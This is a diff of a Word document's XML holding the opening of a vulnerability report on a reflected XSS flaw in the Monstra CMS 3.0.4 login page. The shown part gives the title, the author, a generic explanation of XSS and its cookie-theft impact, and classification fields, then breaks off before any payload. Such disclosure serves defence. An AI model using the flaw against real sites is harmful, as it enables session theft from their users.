--- a/Monstra CMS 3 Login XSS.docx
+++ b/Monstra CMS 3 Login XSS.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -17,7 +17,6 @@
           <w:szCs w:val="51"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -26,9 +25,22 @@
           <w:sz w:val="51"/>
           <w:szCs w:val="51"/>
         </w:rPr>
-        <w:t>Monstra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Monstra CMS 3.0.4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -37,51 +49,7 @@
           <w:sz w:val="51"/>
           <w:szCs w:val="51"/>
         </w:rPr>
-        <w:t xml:space="preserve"> CMS 3.0.4</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="51"/>
-          <w:szCs w:val="51"/>
-        </w:rPr>
-        <w:t>Reflected</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="51"/>
-          <w:szCs w:val="51"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Cross Site Scripting (XSS)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="51"/>
-          <w:szCs w:val="51"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> On Login</w:t>
+        <w:t>Reflected Cross Site Scripting (XSS) On Login</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -242,7 +210,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Author: Nikhil Sahoo </w:t>
+        <w:t>Author: Nikhil Saho</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -252,52 +220,10 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Ipsita</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Subhadarshan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Sahoo</w:t>
-      </w:r>
+        <w:t>o</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -452,373 +378,313 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t>I would like to report a vulnerability that I discovered</w:t>
-      </w:r>
+        <w:t xml:space="preserve">I would like to report a vulnerability that I discovered in Monstra CMS 3.0.4, which can be exploited to perform Reflected Cross-Site Scripting (XSS) attacks. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="295" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:overflowPunct w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="229" w:lineRule="auto"/>
+        <w:ind w:right="120"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="299" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:overflowPunct w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:right="120"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve"> in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source; the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="200" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="254" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="227" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Vulnerability Type:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="1" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Cross Site Scripting (XSS)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="225" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="227" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Vendor of Product:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="1" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t>Monstra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="19"/>
-          <w:szCs w:val="19"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> CMS 3.0.4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="19"/>
-          <w:szCs w:val="19"/>
-        </w:rPr>
-        <w:t>, which can be</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="19"/>
-          <w:szCs w:val="19"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exploited to perform Reflected</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="19"/>
-          <w:szCs w:val="19"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Cross-Site Scripting (XSS) attacks. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="295" w:lineRule="exact"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:overflowPunct w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="229" w:lineRule="auto"/>
-        <w:ind w:right="120"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="299" w:lineRule="exact"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:overflowPunct w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:right="120"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="19"/>
-          <w:szCs w:val="19"/>
-        </w:rPr>
-        <w:t>An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source; the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="200" w:lineRule="exact"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="254" w:lineRule="exact"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>------------------------------------------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="227" w:lineRule="exact"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>Vulnerability Type:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="1" w:lineRule="exact"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>Cross Site Scripting (XSS)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="225" w:lineRule="exact"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
